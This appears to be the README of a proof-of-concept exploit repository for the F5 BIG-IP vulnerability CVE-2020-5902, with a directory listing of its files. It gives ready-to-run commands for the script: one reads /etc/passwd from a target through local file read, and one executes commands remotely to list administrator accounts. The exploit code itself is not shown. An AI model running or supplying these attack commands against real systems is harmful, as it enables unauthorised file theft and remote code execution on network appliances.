Python script to exploit F5 Big-IP CVE-2020-5902 # CVE-2020-5902
Python script to exploit F5 Big-IP CVE-2020-5902
## Examples
Exploit local file read:
`python3 CVE-2020-5902.py -t example.com -x lfr -f /etc/passwd`
Exploit RCE:
`python3 CVE-2020-5902.py -t example.com -x rce -a list+auth+user+admin`
[4.0K] /data/pocs/9ff231703649dfd80314ae2b30b60eb3417f2f9e
├── [3.0K] CVE-2020-5902.py
├── [ 255] README.md
└── [ 17] requirements.txt
0 directories, 3 files